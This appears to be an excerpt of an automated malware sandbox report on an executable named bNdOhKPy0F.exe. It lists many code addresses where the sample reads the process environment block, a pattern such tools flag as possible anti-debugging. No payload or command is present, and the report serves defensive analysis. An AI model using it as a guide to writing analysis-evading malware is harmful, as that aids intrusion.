Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1215C1 mov eax, dword ptr fs:[00000030h] 1_2_6E1215C1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1295F0 mov eax, dword ptr fs:[00000030h] 1_2_6E1295F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1295F0 mov ecx, dword ptr fs:[00000030h] 1_2_6E1295F0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D8DF1 mov eax, dword ptr fs:[00000030h] 1_2_6E1D8DF1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1595EC mov eax, dword ptr fs:[00000030h] 1_2_6E1595EC
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125210 mov eax, dword ptr fs:[00000030h] 1_2_6E125210
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125210 mov ecx, dword ptr fs:[00000030h] 1_2_6E125210
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125210 mov eax, dword ptr fs:[00000030h] 1_2_6E125210
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125210 mov eax, dword ptr fs:[00000030h] 1_2_6E125210
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E143A1C mov eax, dword ptr fs:[00000030h] 1_2_6E143A1C
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E138A0A mov eax, dword ptr fs:[00000030h] 1_2_6E138A0A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E128239 mov eax, dword ptr fs:[00000030h] 1_2_6E128239
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E128239 mov eax, dword ptr fs:[00000030h] 1_2_6E128239
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E128239 mov eax, dword ptr fs:[00000030h] 1_2_6E128239
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124A20 mov eax, dword ptr fs:[00000030h] 1_2_6E124A20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124A20 mov eax, dword ptr fs:[00000030h] 1_2_6E124A20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1AEA20 mov eax, dword ptr fs:[00000030h] 1_2_6E1AEA20
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A229 mov eax, dword ptr fs:[00000030h] 1_2_6E14A229
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B4257 mov eax, dword ptr fs:[00000030h] 1_2_6E1B4257
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122240 mov ecx, dword ptr fs:[00000030h] 1_2_6E122240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E122240 mov eax, dword ptr fs:[00000030h] 1_2_6E122240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129240 mov eax, dword ptr fs:[00000030h] 1_2_6E129240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129240 mov eax, dword ptr fs:[00000030h] 1_2_6E129240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129240 mov eax, dword ptr fs:[00000030h] 1_2_6E129240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129240 mov eax, dword ptr fs:[00000030h] 1_2_6E129240
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B4248 mov eax, dword ptr fs:[00000030h] 1_2_6E1B4248
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E16927A mov eax, dword ptr fs:[00000030h] 1_2_6E16927A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DB260 mov eax, dword ptr fs:[00000030h] 1_2_6E1DB260
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1DB260 mov eax, dword ptr fs:[00000030h] 1_2_6E1DB260
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8A62 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8A62
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15D294 mov eax, dword ptr fs:[00000030h] 1_2_6E15D294
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15D294 mov eax, dword ptr fs:[00000030h] 1_2_6E15D294
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DA88 mov eax, dword ptr fs:[00000030h] 1_2_6E15DA88
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15DA88 mov eax, dword ptr fs:[00000030h] 1_2_6E15DA88
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1512BD mov esi, dword ptr fs:[00000030h] 1_2_6E1512BD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1512BD mov eax, dword ptr fs:[00000030h] 1_2_6E1512BD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1512BD mov eax, dword ptr fs:[00000030h] 1_2_6E1512BD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E121AA0 mov eax, dword ptr fs:[00000030h] 1_2_6E121AA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E155AA0 mov eax, dword ptr fs:[00000030h] 1_2_6E155AA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E155AA0 mov eax, dword ptr fs:[00000030h] 1_2_6E155AA0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 mov eax, dword ptr fs:[00000030h] 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 mov eax, dword ptr fs:[00000030h] 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 mov eax, dword ptr fs:[00000030h] 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 mov eax, dword ptr fs:[00000030h] 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1252A5 mov eax, dword ptr fs:[00000030h] 1_2_6E1252A5
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8ADD mov eax, dword ptr fs:[00000030h] 1_2_6E1F8ADD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125AC0 mov eax, dword ptr fs:[00000030h] 1_2_6E125AC0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125AC0 mov eax, dword ptr fs:[00000030h] 1_2_6E125AC0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125AC0 mov eax, dword ptr fs:[00000030h] 1_2_6E125AC0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123ACA mov eax, dword ptr fs:[00000030h] 1_2_6E123ACA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152ACB mov eax, dword ptr fs:[00000030h] 1_2_6E152ACB
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E4AEF mov eax, dword ptr fs:[00000030h] 1_2_6E1E4AEF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152AE4 mov eax, dword ptr fs:[00000030h] 1_2_6E152AE4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E131B mov eax, dword ptr fs:[00000030h] 1_2_6E1E131B
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A309 mov eax, dword ptr fs:[00000030h] 1_2_6E14A309
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B4320 mov eax, dword ptr fs:[00000030h] 1_2_6E1B4320
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8B58 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8B58
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B5A mov eax, dword ptr fs:[00000030h] 1_2_6E153B5A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B5A mov eax, dword ptr fs:[00000030h] 1_2_6E153B5A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B5A mov eax, dword ptr fs:[00000030h] 1_2_6E153B5A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B5A mov eax, dword ptr fs:[00000030h] 1_2_6E153B5A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F340 mov eax, dword ptr fs:[00000030h] 1_2_6E12F340
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B7A mov eax, dword ptr fs:[00000030h] 1_2_6E153B7A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E153B7A mov eax, dword ptr fs:[00000030h] 1_2_6E153B7A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6365 mov eax, dword ptr fs:[00000030h] 1_2_6E1B6365
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6365 mov eax, dword ptr fs:[00000030h] 1_2_6E1B6365
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1B6365 mov eax, dword ptr fs:[00000030h] 1_2_6E1B6365
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E124B94 mov edi, dword ptr fs:[00000030h] 1_2_6E124B94
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E138A mov eax, dword ptr fs:[00000030h] 1_2_6E1E138A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1CEB8A mov ecx, dword ptr fs:[00000030h] 1_2_6E1CEB8A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1CEB8A mov eax, dword ptr fs:[00000030h] 1_2_6E1CEB8A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1CEB8A mov eax, dword ptr fs:[00000030h] 1_2_6E1CEB8A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1CEB8A mov eax, dword ptr fs:[00000030h] 1_2_6E1CEB8A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F9BBE mov eax, dword ptr fs:[00000030h] 1_2_6E1F9BBE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8BB6 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8BB6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E1BA8 mov eax, dword ptr fs:[00000030h] 1_2_6E1E1BA8
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154BAD mov eax, dword ptr fs:[00000030h] 1_2_6E154BAD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154BAD mov eax, dword ptr fs:[00000030h] 1_2_6E154BAD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154BAD mov eax, dword ptr fs:[00000030h] 1_2_6E154BAD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A53CA mov eax, dword ptr fs:[00000030h] 1_2_6E1A53CA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1A53CA mov eax, dword ptr fs:[00000030h] 1_2_6E1A53CA
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1223F6 mov eax, dword ptr fs:[00000030h] 1_2_6E1223F6
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E121BE9 mov eax, dword ptr fs:[00000030h] 1_2_6E121BE9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14DBE9 mov eax, dword ptr fs:[00000030h] 1_2_6E14DBE9
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D23E3 mov ecx, dword ptr fs:[00000030h] 1_2_6E1D23E3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D23E3 mov ecx, dword ptr fs:[00000030h] 1_2_6E1D23E3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1D23E3 mov eax, dword ptr fs:[00000030h] 1_2_6E1D23E3
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1FF019 mov eax, dword ptr fs:[00000030h] 1_2_6E1FF019
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1FF019 mov eax, dword ptr fs:[00000030h] 1_2_6E1FF019
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F4015 mov eax, dword ptr fs:[00000030h] 1_2_6E1F4015
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F4015 mov eax, dword ptr fs:[00000030h] 1_2_6E1F4015
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F018 mov eax, dword ptr fs:[00000030h] 1_2_6E12F018
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12F018 mov eax, dword ptr fs:[00000030h] 1_2_6E12F018
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126800 mov eax, dword ptr fs:[00000030h] 1_2_6E126800
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126800 mov eax, dword ptr fs:[00000030h] 1_2_6E126800
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E126800 mov eax, dword ptr fs:[00000030h] 1_2_6E126800
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E138800 mov eax, dword ptr fs:[00000030h] 1_2_6E138800
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A830 mov eax, dword ptr fs:[00000030h] 1_2_6E14A830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A830 mov eax, dword ptr fs:[00000030h] 1_2_6E14A830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A830 mov eax, dword ptr fs:[00000030h] 1_2_6E14A830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14A830 mov eax, dword ptr fs:[00000030h] 1_2_6E14A830
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154020 mov edi, dword ptr fs:[00000030h] 1_2_6E154020
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125050 mov eax, dword ptr fs:[00000030h] 1_2_6E125050
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125050 mov eax, dword ptr fs:[00000030h] 1_2_6E125050
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E125050 mov eax, dword ptr fs:[00000030h] 1_2_6E125050
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E127055 mov eax, dword ptr fs:[00000030h] 1_2_6E127055
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F1074 mov eax, dword ptr fs:[00000030h] 1_2_6E1F1074
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1E2073 mov eax, dword ptr fs:[00000030h] 1_2_6E1E2073
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14F86D mov eax, dword ptr fs:[00000030h] 1_2_6E14F86D
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123880 mov eax, dword ptr fs:[00000030h] 1_2_6E123880
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123880 mov eax, dword ptr fs:[00000030h] 1_2_6E123880
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15F0BF mov ecx, dword ptr fs:[00000030h] 1_2_6E15F0BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15F0BF mov eax, dword ptr fs:[00000030h] 1_2_6E15F0BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15F0BF mov eax, dword ptr fs:[00000030h] 1_2_6E15F0BF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1690AF mov eax, dword ptr fs:[00000030h] 1_2_6E1690AF
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov eax, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov eax, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov eax, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov ecx, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov eax, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328AE mov eax, dword ptr fs:[00000030h] 1_2_6E1328AE
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1270C0 mov eax, dword ptr fs:[00000030h] 1_2_6E1270C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1270C0 mov eax, dword ptr fs:[00000030h] 1_2_6E1270C0
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328FD mov eax, dword ptr fs:[00000030h] 1_2_6E1328FD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328FD mov eax, dword ptr fs:[00000030h] 1_2_6E1328FD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1328FD mov eax, dword ptr fs:[00000030h] 1_2_6E1328FD
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B8E4 mov eax, dword ptr fs:[00000030h] 1_2_6E14B8E4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B8E4 mov eax, dword ptr fs:[00000030h] 1_2_6E14B8E4
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1240E1 mov eax, dword ptr fs:[00000030h] 1_2_6E1240E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1240E1 mov eax, dword ptr fs:[00000030h] 1_2_6E1240E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1240E1 mov eax, dword ptr fs:[00000030h] 1_2_6E1240E1
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1258EC mov eax, dword ptr fs:[00000030h] 1_2_6E1258EC
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129100 mov eax, dword ptr fs:[00000030h] 1_2_6E129100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129100 mov eax, dword ptr fs:[00000030h] 1_2_6E129100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E129100 mov eax, dword ptr fs:[00000030h] 1_2_6E129100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E130100 mov eax, dword ptr fs:[00000030h] 1_2_6E130100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E130100 mov eax, dword ptr fs:[00000030h] 1_2_6E130100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E130100 mov eax, dword ptr fs:[00000030h] 1_2_6E130100
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E123138 mov ecx, dword ptr fs:[00000030h] 1_2_6E123138
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15513A mov eax, dword ptr fs:[00000030h] 1_2_6E15513A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E15513A mov eax, dword ptr fs:[00000030h] 1_2_6E15513A
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 mov eax, dword ptr fs:[00000030h] 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 mov eax, dword ptr fs:[00000030h] 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 mov eax, dword ptr fs:[00000030h] 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 mov eax, dword ptr fs:[00000030h] 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E144120 mov ecx, dword ptr fs:[00000030h] 1_2_6E144120
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12395E mov eax, dword ptr fs:[00000030h] 1_2_6E12395E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12395E mov eax, dword ptr fs:[00000030h] 1_2_6E12395E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B944 mov eax, dword ptr fs:[00000030h] 1_2_6E14B944
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E14B944 mov eax, dword ptr fs:[00000030h] 1_2_6E14B944
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B171 mov eax, dword ptr fs:[00000030h] 1_2_6E12B171
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12B171 mov eax, dword ptr fs:[00000030h] 1_2_6E12B171
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1F8966 mov eax, dword ptr fs:[00000030h] 1_2_6E1F8966
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1EE962 mov eax, dword ptr fs:[00000030h] 1_2_6E1EE962
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E154190 mov eax, dword ptr fs:[00000030h] 1_2_6E154190
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E152990 mov eax, dword ptr fs:[00000030h] 1_2_6E152990
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12519E mov eax, dword ptr fs:[00000030h] 1_2_6E12519E
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E12519E mov ecx, dword ptr fs:[00000030h] 1_2_6E12519E
